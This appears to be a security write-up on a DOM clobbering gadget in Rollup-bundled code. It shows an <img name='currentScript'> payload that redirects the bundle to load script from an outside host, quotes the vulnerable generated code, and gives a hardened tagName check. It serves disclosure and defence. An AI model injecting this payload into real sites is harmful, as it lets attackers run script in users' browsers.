Next-generation ES module bundler
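As with Webpack, modules were loaded dynamically from a path built on document.currentScript.src. document.currentScript can be clobbered by an injected element named "currentScript", so the attacker-controlled src becomes the base path for the loaded module.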
<!-- user input -->
<img name="currentScript" src="https://gmsgadget.com/assets/xss/">
<script nonce="secret" src="https://gmsgadget.com/assets/libs/rollup/bundle.js"></script>
Root Cause
Source: https://github.com/rollup/rollup/blob/v4.22.3/test/form/samples/import-meta/_expected/cjs.js
var _documentCurrentScript = typeof document !== 'undefined' ? document.currentScript : null;
var s = document.createElement('script');
s.src = (typeof document === 'undefined' ? require('u' + 'rl').pathToFileURL(__filename).href : (_documentCurrentScript && _documentCurrentScript.src || new URL('bundle.js', document.baseURI).href)) + 'extra.js';
document.head.append(s);
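A tag-name check on document.currentScript closes the clobbering path shown above. The following is an added example, not Rollup's code: unsafeScriptBase, safeScriptBase and the mock documents (including the https://app.example/page/ base) are constructed for illustration so the comparison runs in Node without a DOM.

```javascript
// Constructed stand-ins for `document`; in a browser, pass the real one.
const BASE = 'https://app.example/page/'; // assumed page base URI
const legitDoc = {
  baseURI: BASE,
  currentScript: { tagName: 'SCRIPT', src: 'https://gmsgadget.com/assets/libs/rollup/bundle.js' },
};
// What `<img name="currentScript" src="...">` makes document.currentScript return.
const clobberedDoc = {
  baseURI: BASE,
  currentScript: { tagName: 'IMG', src: 'https://gmsgadget.com/assets/xss/' },
};
// Two same-named elements yield an HTMLCollection: no tagName, no src.
const collectionDoc = { baseURI: BASE, currentScript: { length: 2 } };

// Mirrors the fallback chain in the generated code above: it trusts
// whatever object document.currentScript resolves to.
function unsafeScriptBase(doc) {
  const cs = doc.currentScript;
  return (cs && cs.src) || new URL('bundle.js', doc.baseURI).href;
}

// Hardened variant (hypothetical helper): accept currentScript only when it
// really is a <script> element, otherwise fall back to the document base URI.
function safeScriptBase(doc) {
  const cs = doc.currentScript;
  const isScript = cs && typeof cs.tagName === 'string' &&
    cs.tagName.toUpperCase() === 'SCRIPT';
  return (isScript && cs.src) || new URL('bundle.js', doc.baseURI).href;
}

// Side-by-side view of both resolvers for one document.
function compare(doc) {
  return { unsafe: unsafeScriptBase(doc), safe: safeScriptBase(doc) };
}

console.log('legit     ', compare(legitDoc));
console.log('clobbered ', compare(clobberedDoc));
console.log('collection', compare(collectionDoc));
```

The check does not replace sanitizing the name and id attributes in user-supplied markup; it only stops the bundle from trusting a non-script element.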
Related links:
Found by jackfromeast, ishmeals.